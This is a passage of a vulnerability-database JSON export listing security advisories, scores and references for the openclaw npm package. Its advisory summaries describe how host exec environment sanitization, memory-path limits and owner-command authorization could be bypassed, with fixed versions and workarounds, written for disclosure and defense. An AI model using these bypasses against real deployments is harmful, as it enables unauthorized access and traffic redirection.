bility":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11-beta.1"}],"aliases":["GHSA-hh43-q692-2xmq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a2t8-px5b-nfgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89853?format=json","vulnerability_id":"VCID-a2wx-7b8h-c3h1","summary":"OpenClaw: PIP_INDEX_URL and UV_INDEX_URL bypass host exec env sanitization and redirect Python package-index traffic\n## Summary\n`PIP_INDEX_URL` and `UV_INDEX_URL` bypass host exec env sanitization and redirect Python package-index traffic\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still allows Python package-index env redirection through host exec, but scope should stay limited to approved or allowlisted package-management exec paths, not arbitrary remote execution.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d` — 2026-03-31T09:53:32+09:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41391","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04648","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04661","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04675","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41391"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41391","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41391"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling"},{"reference_url":"https://github.com/advisories/GHSA-7ggg-pvrf-458v","reference_id":"GHSA-7ggg-pvrf-458v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7ggg-pvrf-458v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41391","GHSA-7ggg-pvrf-458v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a2wx-7b8h-c3h1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89810?format=json","vulnerability_id":"VCID-a46u-tnbh-fyhs","summary":"OpenClaw: QMD memory_get restricts reads to canonical or indexed memory paths\n## Summary\n\nThe QMD backend `memory_get` read path accepted arbitrary workspace Markdown paths that were inside the workspace but outside the canonical memory locations or indexed QMD result set.\n\n## Impact\n\nWhen the QMD backend was enabled, a caller with access to `memory_get` could read arbitrary `*.md` files under the configured workspace root, even when those files were not canonical memory files and had not been returned by QMD search. Severity remains low because exploitation requires access to the memory tool surface and is limited to workspace Markdown files, but it bypassed the intended memory-path policy.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` restricts QMD reads to canonical memory paths or previously indexed QMD workspace paths. Workspace containment alone is no longer sufficient.\n\nVerified in `v2026.4.15`:\n\n- `extensions/memory-core/src/memory/qmd-manager.ts` rejects non-default workspace Markdown paths unless they match an indexed QMD workspace read path.\n- `extensions/memory-core/src/memory/qmd-manager.test.ts` covers QMD session search-result reads and the read-path restriction behavior.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `37d5971db36491d5050efd42c333cbe0b98ed292` via PR #66026\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/37d5971db36491d5050efd42c333cbe0b98ed292"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66026","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66026"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f934-5rqf-xx47"},{"reference_url":"https://github.com/advisories/GHSA-f934-5rqf-xx47","reference_id":"GHSA-f934-5rqf-xx47","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f934-5rqf-xx47"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["GHSA-f934-5rqf-xx47"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a46u-tnbh-fyhs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90199?format=json","vulnerability_id":"VCID-a4jz-y9s4-zkfg","summary":"OpenClaw: Owner-enforced commands could accept wildcard channel senders as command owners\n## Impact\n\nOpenClaw deployments before `2026.4.21` could treat a non-owner sender as authorized for owner-enforced slash commands when all of the following were true:\n\n- a channel plugin declared `commands.enforceOwnerForCommands: true`;\n- the channel accepted wildcard inbound senders with `allowFrom: [\"*\"]`;\n- no explicit `commands.ownerAllowFrom` was configured.\n\nIn that state, `src/auto-reply/command-auth.ts` reused the channel inbound wildcard as part of the command-owner decision. A sender who was not the owner could therefore pass the owner-command gate for commands such as `/send`, `/config`, or `/debug` on the affected channel.\n\nThe issue is limited to the command-owner authorization axis. It does not by itself grant owner-only tool access, host/sandbox access, or gateway administrator scope.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.20`\n- Patched version: `2026.4.21`\n\nThe latest public release, `2026.4.21`, contains the fix.\n\n## Patches\n\nThe fix requires a concrete owner identity or internal operator-admin scope when a plugin enforces owner-only commands. Wildcard channel `allowFrom` no longer implies wildcard command ownership.\n\nFix commits:\n\n- `2aa93d44a1b2c7058c371f261fda2b5d4de4a882` on `main`\n- `995febb7b1e811ff6a1df5b18c22de94103f4c9f` in the `2026.4.21` release line\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.21` or later. Before upgrading, avoid wildcard/open-DM sender policy on owner-enforced channels, or configure `commands.ownerAllowFrom` to the intended owner identities.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44991","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08975","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08973","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08993","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44991"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2aa93d44a1b2c7058c371f261fda2b5d4de4a882"},{"reference_url":"https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de94103f4c9f","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:26:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/995febb7b1e811ff6a1df5b18c22de94103f4c9f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-c28g-vh7m-fm7v","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI: